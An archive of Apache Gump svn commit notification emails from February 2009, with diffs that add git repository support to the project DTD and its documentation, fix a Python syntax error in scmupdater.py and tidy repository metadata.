svn:eol-style = native Modified: gump/live/src/documentation/content/xdocs/bylaws.xml URL: http://svn.apache.org/viewvc/gump/live/src/documentation/content/xdocs/bylaws.xml?rev=745037&r1=745036&r2=745037&view=diff ============================================================================== --- gump/live/src/documentation/content/xdocs/bylaws.xml (original) +++ gump/live/src/documentation/content/xdocs/bylaws.xml Tue Feb 17 13:10:13 2009 @@ -378,4 +378,4 @@ </section> </section> </body> -</document> \ No newline at end of file +</document> From [email protected] Tue Feb 17 17:37:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73231 invoked from network); 17 Feb 2009 17:37:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Feb 2009 17:37:23 -0000 Received: (qmail 21513 invoked by uid 500); 17 Feb 2009 17:37:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21502 invoked by uid 99); 17 Feb 2009 17:37:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Feb 2009 09:37:23 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Feb 2009 17:37:22 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7E52C238899E; Tue, 17 Feb 2009 17:37:02 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745166 - /gump/live/python/gump/core/update/scmupdater.py Date: Tue, 17 Feb 2009 17:37:02 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Tue Feb 17 17:37:01 2009 New Revision: 745166 URL: http://svn.apache.org/viewvc?rev=745166&view=rev Log: I knew Id break things with the four lines that are different between trunk and live Modified: gump/live/python/gump/core/update/scmupdater.py Modified: gump/live/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/scmupdater.py?rev=745166&r1=745165&r2=745166&view=diff ============================================================================== --- gump/live/python/gump/core/update/scmupdater.py (original) +++ gump/live/python/gump/core/update/scmupdater.py Tue Feb 17 17:37:01 2009 @@ -100,10 +100,10 @@ # Black mark for this repository repository = module.getRepository() - repository.addError('*** Failed to update %s from source' + \ - ' control. Stale contents ***' \ - % module.getName()) - + repository.addError('*** Failed to update ' module.name + \ + 'from source control. Stale '+ \ + 'contents ***') + # Kinda bogus, but better than nowt (for now) module.changeState(STATE_SUCCESS, REASON_UPDATE_FAILED) From [email protected] Wed Feb 18 04:46:43 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10018 invoked from network); 18 Feb 2009 04:46:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2009 04:46:43 -0000 Received: (qmail 92947 invoked by uid 500); 18 Feb 2009 04:46:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92937 invoked by uid 99); 18 Feb 2009 04:46:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Feb 2009 20:46:43 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 04:46:41 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C6CD523889BB; Wed, 18 Feb 2009 04:46:20 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745378 - /gump/live/python/gump/core/update/scmupdater.py Date: Wed, 18 Feb 2009 04:46:20 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 18 04:46:19 2009 New Revision: 745378 URL: http://svn.apache.org/viewvc?rev=745378&view=rev Log: I'm really not built for writing Python code without running it. Fix syntax error. Modified: gump/live/python/gump/core/update/scmupdater.py Modified: gump/live/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/live/python/gump/core/update/scmupdater.py?rev=745378&r1=745377&r2=745378&view=diff ============================================================================== --- gump/live/python/gump/core/update/scmupdater.py (original) +++ gump/live/python/gump/core/update/scmupdater.py Wed Feb 18 04:46:19 2009 @@ -100,7 +100,7 @@ # Black mark for this repository repository = module.getRepository() - repository.addError('*** Failed to update ' module.name + \ + repository.addError('*** Failed to update ' + module.name +\ 'from source control. Stale '+ \ 'contents ***') From [email protected] Wed Feb 18 10:05:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70505 invoked from network); 18 Feb 2009 10:05:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2009 10:05:21 -0000 Received: (qmail 20606 invoked by uid 500); 18 Feb 2009 10:05:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20597 invoked by uid 99); 18 Feb 2009 10:05:21 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 02:05:21 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 10:05:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6FCEA2388995; Wed, 18 Feb 2009 10:05:00 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745461 - /gump/metadata/dtd/project.dtd Date: Wed, 18 Feb 2009 10:05:00 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 18 10:05:00 2009 New Revision: 745461 URL: http://svn.apache.org/viewvc?rev=745461&view=rev Log: git support is there Modified: gump/metadata/dtd/project.dtd Modified: gump/metadata/dtd/project.dtd URL: http://svn.apache.org/viewvc/gump/metadata/dtd/project.dtd?rev=745461&r1=745460&r2=745461&view=diff ============================================================================== --- gump/metadata/dtd/project.dtd (original) +++ gump/metadata/dtd/project.dtd Wed Feb 18 10:05:00 2009 @@ -21,7 +21,8 @@ | http://gump.apache.org/metadata/project.html +--> -<!ELEMENT module ( url | description | nag | cvs | svn | p4 | redistributable | project )* > +<!ELEMENT module ( url | description | nag | cvs | svn | p4 | git + | redistributable | project )* > <!ELEMENT project ( ant | maven | mvn | nant | script | configure | make | package | mkdir | depend | option | home | jar | delete | description | work | license | nag | url | javadoc | junitreport | redistributable | xmlreport )* > <!ELEMENT ant ( property | depend | sysproperty | mkdir | jvmarg )* > @@ -47,6 +48,7 @@ <!ELEMENT cvs EMPTY > <!ELEMENT svn EMPTY > <!ELEMENT p4 EMPTY > +<!ELEMENT git EMPTY > <!ELEMENT property EMPTY > <!ELEMENT sysproperty EMPTY > <!ELEMENT mkdir EMPTY > @@ -186,6 +188,10 @@ <!ATTLIST p4 repository CDATA #REQUIRED > +<!ATTLIST git + dir CDATA #IMPLIED + repository CDATA #IMPLIED > + <!ATTLIST property id CDATA #IMPLIED name CDATA #REQUIRED From [email protected] Wed Feb 18 10:21:16 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82570 invoked from network); 18 Feb 2009 10:21:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2009 10:21:16 -0000 Received: (qmail 38800 invoked by uid 500); 18 Feb 2009 10:21:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38791 invoked by uid 99); 18 Feb 2009 10:21:16 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 02:21:16 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 10:21:08 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 00F402388888; Wed, 18 Feb 2009 10:20:47 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745465 - in /gump/trunk/src/documentation/content/xdocs/metadata: module.xml repository.xml Date: Wed, 18 Feb 2009 10:20:47 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 18 10:20:47 2009 New Revision: 745465 URL: http://svn.apache.org/viewvc?rev=745465&view=rev Log: document git support Modified: gump/trunk/src/documentation/content/xdocs/metadata/module.xml gump/trunk/src/documentation/content/xdocs/metadata/repository.xml Modified: gump/trunk/src/documentation/content/xdocs/metadata/module.xml URL: http://svn.apache.org/viewvc/gump/trunk/src/documentation/content/xdocs/metadata/module.xml?rev=745465&r1=745464&r2=745465&view=diff ============================================================================== --- gump/trunk/src/documentation/content/xdocs/metadata/module.xml (original) +++ gump/trunk/src/documentation/content/xdocs/metadata/module.xml Wed Feb 18 10:20:47 2009 @@ -97,10 +97,6 @@ <p>References the <link href="repository.html">repository</link> in which this project resides. May also contain various overrides.</p> - <p>Note: as the long term plans is to make Gump handle many different - types of repository types, the name of this element should ultimately - change</p> - <table> <tr> <th>Attribute</th> @@ -147,8 +143,10 @@ <section><title>svn</title> - <p>References a <link href="http://subversion.tigris.org">Subversion</link> - repository in which this project resides.</p> + <p>References the + Subversion <link href="repository.html">repository</link> in + which this project resides. May also contain various + overrides.</p> <table> <tr> @@ -157,16 +155,18 @@ <th>Required?</th> </tr> <tr> - <td>url</td> - <td>The url of the repository in which this module resides.</td> + <td>repository</td> + <td>The name of the repository in which this module resides.</td> <td>Yes</td> </tr> + <tr> + <td>dir</td> + <td>The subdirectory in which the svn module is present. Useful + for repositories like Apache's which organize related modules + into directories.</td> + <td>No</td> + </tr> </table> - - <p>For example:</p> - <source> - &lt;svn url="http://svn.collab.net/repos/svn/trunk" /&gt; -</source> </section> <section><title>p4</title> @@ -193,6 +193,34 @@ </source> </section> + <section><title>git</title> + + <p>References the + Git <link href="repository.html">repository</link> in + which this project resides. May also contain various + overrides.</p> + + <table> + <tr> + <th>Attribute</th> + <th>Description</th> + <th>Required?</th> + </tr> + <tr> + <td>repository</td> + <td>The name of the repository in which this module resides.</td> + <td>Yes</td> + </tr> + <tr> + <td>dir</td> + <td>The subdirectory in which the svn module is present. + Useful for repositories which organize related modules into + directories.</td> + <td>No</td> + </tr> + </table> + </section> + <section><title>project</title> <p>A definition of a <link href="project.html">project</link> which is physically contained in this module.</p> Modified: gump/trunk/src/documentation/content/xdocs/metadata/repository.xml URL: http://svn.apache.org/viewvc/gump/trunk/src/documentation/content/xdocs/metadata/repository.xml?rev=745465&r1=745464&r2=745465&view=diff ============================================================================== --- gump/trunk/src/documentation/content/xdocs/metadata/repository.xml (original) +++ gump/trunk/src/documentation/content/xdocs/metadata/repository.xml Wed Feb 18 10:20:47 2009 @@ -44,7 +44,9 @@ <tr> <td>type</td> <td>Type of repository.</td> - <td><strong>cvs</strong>,<strong>svn</strong>,<strong>jars</strong>,<strong>p4</strong> currently supported.</td> + <td><strong>cvs</strong>, <strong>svn</strong>, <strong>jars</strong>, + <strong>p4</strong>, <strong>git</strong> currently + supported.</td> </tr> <tr> <td>compress</td> @@ -211,6 +213,35 @@ </table> </section> </section> + <section> + <title>GIT Usage</title><note>This is for type='git' only.</note> + + <p>This specifies all of the elements which are combined to + form an git command line They are split out into separate + entities so that each can be individually overridden in a + workspace definition. When an entity is listed as required + below, it means that when all of the definitions are combined + the entity must have a value - a workspace or profile, for + example, only needs to contain the values which it + overrides.</p> + + <table> + <tr> + <th>Entity</th> + <th>Description</th> + <th>Required?</th> + </tr> + <tr> + <td>url</td> + <td>This is the base URL for all modules that reside + within this repository. + The <link href="module.html">module</link>'s + &lt;git <strong>dir</strong> attribute if appended to + this base url.</td> + <td>Yes</td> + </tr> + </table> </section> + </section> </body> </document> From [email protected] Wed Feb 18 10:22:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83426 invoked from network); 18 Feb 2009 10:22:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2009 10:22:21 -0000 Received: (qmail 40114 invoked by uid 500); 18 Feb 2009 10:22:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40105 invoked by uid 99); 18 Feb 2009 10:22:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 02:22:21 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 10:22:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9417E2388995; Wed, 18 Feb 2009 10:21:49 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745467 - in /gump/site/metadata: module.html repository.html Date: Wed, 18 Feb 2009 10:21:49 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 18 10:21:49 2009 New Revision: 745467 URL: http://svn.apache.org/viewvc?rev=745467&view=rev Log: re-generate site Modified: gump/site/metadata/module.html gump/site/metadata/repository.html Modified: gump/site/metadata/module.html URL: http://svn.apache.org/viewvc/gump/site/metadata/module.html?rev=745467&r1=745466&r2=745467&view=diff ============================================================================== --- gump/site/metadata/module.html (original) +++ gump/site/metadata/module.html Wed Feb 18 10:21:49 2009 @@ -153,6 +153,9 @@ <a href="#p4">p4</a> </li> <li> +<a href="#git">git</a> +</li> +<li> <a href="#project">project</a> </li> <li> @@ -261,9 +264,6 @@ <h3 class="boxed">cvs</h3> <p>References the <a href="repository.html">repository</a> in which this project resides. May also contain various overrides.</p> -<p>Note: as the long term plans is to make Gump handle many different - types of repository types, the name of this element should ultimately - change</p> <table class="ForrestTable" cellspacing="1" cellpadding="4"> <tr> @@ -328,10 +328,12 @@ </tr> </table> -<a name="N1015C"></a><a name="svn"></a> +<a name="N10159"></a><a name="svn"></a> <h3 class="boxed">svn</h3> -<p>References a <a href="http://subversion.tigris.org">Subversion</a> - repository in which this project resides.</p> +<p>References the + Subversion <a href="repository.html">repository</a> in + which this project resides. May also contain various + overrides.</p> <table class="ForrestTable" cellspacing="1" cellpadding="4"> <tr> @@ -344,18 +346,24 @@ <tr> -<td colspan="1" rowspan="1">url</td> - <td colspan="1" rowspan="1">The url of the repository in which this module resides.</td> +<td colspan="1" rowspan="1">repository</td> + <td colspan="1" rowspan="1">The name of the repository in which this module resides.</td> <td colspan="1" rowspan="1">Yes</td> </tr> + +<tr> + +<td colspan="1" rowspan="1">dir</td> + <td colspan="1" rowspan="1">The subdirectory in which the svn module is present. Useful + for repositories like Apache's which organize related modules + into directories.</td> + <td colspan="1" rowspan="1">No</td> + +</tr> </table> -<p>For example:</p> -<pre class="code"> - &lt;svn url="http://svn.collab.net/repos/svn/trunk" /&gt; -</pre> -<a name="N10197"></a><a name="p4"></a> +<a name="N1019F"></a><a name="p4"></a> <h3 class="boxed">p4</h3> <p>References a <a href="http://www.perforce.com/">Perforce</a> repository in which this project resides.</p> @@ -382,11 +390,46 @@ <pre class="code"> &lt;p4 repository="my-p4-repository"/&gt; </pre> -<a name="N101D2"></a><a name="project"></a> +<a name="N101DA"></a><a name="git"></a> +<h3 class="boxed">git</h3> +<p>References the + Git <a href="repository.html">repository</a> in + which this project resides. May also contain various + overrides.</p> +<table class="ForrestTable" cellspacing="1" cellpadding="4"> + +<tr> + +<th colspan="1" rowspan="1">Attribute</th> + <th colspan="1" rowspan="1">Description</th> + <th colspan="1" rowspan="1">Required?</th> + +</tr> + +<tr> + +<td colspan="1" rowspan="1">repository</td> + <td colspan="1" rowspan="1">The name of the repository in which this module resides.</td> + <td colspan="1" rowspan="1">Yes</td> + +</tr> + +<tr> + +<td colspan="1" rowspan="1">dir</td> + <td colspan="1" rowspan="1">The subdirectory in which the svn module is present. + Useful for repositories which organize related modules into + directories.</td> + <td colspan="1" rowspan="1">No</td> + +</tr> + +</table> +<a name="N10220"></a><a name="project"></a> <h3 class="boxed">project</h3> <p>A definition of a <a href="project.html">project</a> which is physically contained in this module.</p> -<a name="N101DF"></a><a name="redistributable"></a> +<a name="N1022D"></a><a name="redistributable"></a> <h3 class="boxed">redistributable</h3> <p>If present, indicates that outputs of builds from this module are redistributable. Defaults to the redistributable value for Modified: gump/site/metadata/repository.html URL: http://svn.apache.org/viewvc/gump/site/metadata/repository.html?rev=745467&r1=745466&r2=745467&view=diff ============================================================================== --- gump/site/metadata/repository.html (original) +++ gump/site/metadata/repository.html Wed Feb 18 10:21:49 2009 @@ -152,10 +152,13 @@ <a href="#Perforce+Usage">Perforce Usage</a> <ul class="minitoc"> <li> -<a href="#root-N101C8">root</a> +<a href="#root-N101CB">root</a> </li> </ul> </li> +<li> +<a href="#GIT+Usage">GIT Usage</a> +</li> </ul> </li> </ul> @@ -190,7 +193,9 @@ <td colspan="1" rowspan="1">type</td> <td colspan="1" rowspan="1">Type of repository.</td> - <td colspan="1" rowspan="1"><strong>cvs</strong>,<strong>svn</strong>,<strong>jars</strong>,<strong>p4</strong> currently supported.</td> + <td colspan="1" rowspan="1"><strong>cvs</strong>, <strong>svn</strong>, <strong>jars</strong>, + <strong>p4</strong>, <strong>git</strong> currently + supported.</td> </tr> @@ -257,9 +262,9 @@ </table> <p></p> -<a name="N100E7"></a><a name="CVS+Usage"></a> +<a name="N100EA"></a><a name="CVS+Usage"></a> <h3 class="boxed">CVS Usage</h3> -<a name="N100ED"></a><a name="root"></a> +<a name="N100F0"></a><a name="root"></a> <h4>root</h4> <div class="note"> <div class="label">Note</div> @@ -323,7 +328,7 @@ </tr> </table> -<a name="N10164"></a><a name="SVN+Usage"></a> +<a name="N10167"></a><a name="SVN+Usage"></a> <h3 class="boxed">SVN Usage</h3> <div class="note"> <div class="label">Note</div> @@ -373,9 +378,9 @@ </tr> </table> -<a name="N101C2"></a><a name="Perforce+Usage"></a> +<a name="N101C5"></a><a name="Perforce+Usage"></a> <h3 class="boxed">Perforce Usage</h3> -<a name="N101C8"></a><a name="root-N101C8"></a> +<a name="N101CB"></a><a name="root-N101CB"></a> <h4>root</h4> <div class="note"> <div class="label">Note</div> @@ -431,6 +436,43 @@ </tr> </table> +<a name="N10234"></a><a name="GIT+Usage"></a> +<h3 class="boxed">GIT Usage</h3> +<div class="note"> +<div class="label">Note</div> +<div class="content">This is for type='git' only.</div> +</div> +<p>This specifies all of the elements which are combined to + form an git command line They are split out into separate + entities so that each can be individually overridden in a + workspace definition. When an entity is listed as required + below, it means that when all of the definitions are combined + the entity must have a value - a workspace or profile, for + example, only needs to contain the values which it + overrides.</p> +<table class="ForrestTable" cellspacing="1" cellpadding="4"> + +<tr> + +<th colspan="1" rowspan="1">Entity</th> + <th colspan="1" rowspan="1">Description</th> + <th colspan="1" rowspan="1">Required?</th> + +</tr> + +<tr> + +<td colspan="1" rowspan="1">url</td> + <td colspan="1" rowspan="1">This is the base URL for all modules that reside + within this repository. + The <a href="module.html">module</a>'s + &lt;git <strong>dir</strong> attribute if appended to + this base url.</td> + <td colspan="1" rowspan="1">Yes</td> + +</tr> + +</table> </div> <p align="right"> From [email protected] Wed Feb 18 17:02:09 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7359 invoked from network); 18 Feb 2009 17:02:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2009 17:02:08 -0000 Received: (qmail 99119 invoked by uid 500); 18 Feb 2009 17:02:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99110 invoked by uid 99); 18 Feb 2009 17:02:08 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 09:02:08 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 17:02:07 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A4FD52388844; Wed, 18 Feb 2009 17:01:47 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745572 - in /gump/metadata: profile/gump.xml project/town.xml repository/whichever.xml Date: Wed, 18 Feb 2009 17:01:47 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 18 17:01:47 2009 New Revision: 745572 URL: http://svn.apache.org/viewvc?rev=745572&view=rev Log: remove town Removed: gump/metadata/project/town.xml gump/metadata/repository/whichever.xml Modified: gump/metadata/profile/gump.xml Modified: gump/metadata/profile/gump.xml URL: http://svn.apache.org/viewvc/gump/metadata/profile/gump.xml?rev=745572&r1=745571&r2=745572&view=diff ============================================================================== --- gump/metadata/profile/gump.xml (original) +++ gump/metadata/profile/gump.xml Wed Feb 18 17:01:47 2009 @@ -392,7 +392,6 @@ <module href="project/eclipse.xml"/> <module href="project/radeox.xml"/> <module href="project/snacc4j.xml"/> - <module href="project/town.xml"/> <module href="project/testng.xml"/> <module href="project/uddi4j.xml"/> <module href="project/village.xml"/> @@ -703,7 +702,6 @@ <repository href="repository/tomcat.xml" /> <repository href="repository/turbine.xml" /> <repository href="repository/webservices.xml"/> - <repository href="repository/whichever.xml"/> <repository href="repository/w3c.xml"/> <repository href="repository/ws.xml"/> <repository href="repository/ws-fx.xml"/> From [email protected] Wed Feb 18 17:11:12 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13404 invoked from network); 18 Feb 2009 17:11:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2009 17:11:11 -0000 Received: (qmail 24442 invoked by uid 500); 18 Feb 2009 17:11:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24433 invoked by uid 99); 18 Feb 2009 17:11:11 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 09:11:11 -0800 X-ASF-Spam-Status: No, hits=-1999.0 required=10.0 tests=ALL_TRUSTED,FR_3TAG_3TAG X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 17:10:58 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id BAC7D2388844; Wed, 18 Feb 2009 17:10:36 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745574 - /gump/metadata/repository/ Date: Wed, 18 Feb 2009 17:10:33 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 18 17:10:30 2009 New Revision: 745574 URL: http://svn.apache.org/viewvc?rev=745574&view=rev Log: replace deprecated cvsweb element Modified: gump/metadata/repository/activemq.xml gump/metadata/repository/ant.xml gump/metadata/repository/antbook.xml gump/metadata/repository/antworks.xml gump/metadata/repository/aopalliance.xml gump/metadata/repository/apache-httpd.xml gump/metadata/repository/apache-incubator-svn.xml gump/metadata/repository/apr.xml gump/metadata/repository/asf.xml gump/metadata/repository/avalon-svn.xml gump/metadata/repository/avalon.xml gump/metadata/repository/barcode4j.xml gump/metadata/repository/beaver.xml gump/metadata/repository/beepcore.xml gump/metadata/repository/cargo.xml gump/metadata/repository/castor.xml gump/metadata/repository/classpath.xml gump/metadata/repository/cocoon.xml gump/metadata/repository/cocoondev.xml gump/metadata/repository/codehaus-svn.xml gump/metadata/repository/codehaus.xml gump/metadata/repository/codehaus_annogen.xml gump/metadata/repository/codehaus_projects.xml gump/metadata/repository/codehaus_scm.xml gump/metadata/repository/commons-svn.xml gump/metadata/repository/db-svn.xml gump/metadata/repository/db.xml gump/metadata/repository/dbxml.xml gump/metadata/repository/directory.xml gump/metadata/repository/eclipse.xml gump/metadata/repository/excalibur-svn.xml gump/metadata/repository/exolab.xml gump/metadata/repository/forrest.xml gump/metadata/repository/geronimo.xml gump/metadata/repository/ggf-cddlm.xml gump/metadata/repository/gleamynode.xml gump/metadata/repository/hamcrest.xml gump/metadata/repository/htmlparser.xml gump/metadata/repository/httpcomponents.xml gump/metadata/repository/incubator.xml gump/metadata/repository/intalio.xml gump/metadata/repository/jacorb.xml gump/metadata/repository/jakarta-svn.xml gump/metadata/repository/jakarta.xml gump/metadata/repository/james.xml gump/metadata/repository/jamonapi.xml gump/metadata/repository/javanet.xml gump/metadata/repository/jboss.xml gump/metadata/repository/jdom.xml gump/metadata/repository/junit.xml gump/metadata/repository/kaffe.xml gump/metadata/repository/krysalis.xml gump/metadata/repository/lenya.xml gump/metadata/repository/logging.xml gump/metadata/repository/lucene.xml gump/metadata/repository/maven.xml gump/metadata/repository/mina.xml gump/metadata/repository/mozilla.xml gump/metadata/repository/myfaces.xml gump/metadata/repository/objectweb.xml gump/metadata/repository/opensaml.xml gump/metadata/repository/poi.xml gump/metadata/repository/portals.xml gump/metadata/repository/slf4j.xml gump/metadata/repository/smartfrog.xml gump/metadata/repository/sourceforge-ant-contrib.xml gump/metadata/repository/sourceforge-mx4j.xml gump/metadata/repository/sourceforge-xmlunit.xml gump/metadata/repository/sourceforge.xml gump/metadata/repository/struts-svn.xml gump/metadata/repository/testng.xml gump/metadata/repository/tigris.xml gump/metadata/repository/tomcat.xml gump/metadata/repository/turbine.xml gump/metadata/repository/w3c.xml gump/metadata/repository/webservices.xml gump/metadata/repository/ws-fx.xml gump/metadata/repository/ws.xml gump/metadata/repository/wyona.xml gump/metadata/repository/xalan.xml gump/metadata/repository/xerces.xml gump/metadata/repository/xml-svn.xml gump/metadata/repository/xml.xml gump/metadata/repository/xmlbeans.xml gump/metadata/repository/xmlgraphics.xml gump/metadata/repository/xpp.xml gump/metadata/repository/xstream.xml gump/metadata/repository/zenplex.xml Modified: gump/metadata/repository/activemq.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/activemq.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/activemq.xml (original) +++ gump/metadata/repository/activemq.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache ActiveMQ</title> <home-page>http://activemq.apache.org</home-page> - <cvsweb>http://svn.apache.org/viewvc/activemq/</cvsweb> + <web>http://svn.apache.org/viewvc/activemq/</web> <url>http://svn.apache.org/repos/asf/activemq/</url> Modified: gump/metadata/repository/ant.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/ant.xml?rev=745574&r1=745573&r2=745574&view=diff 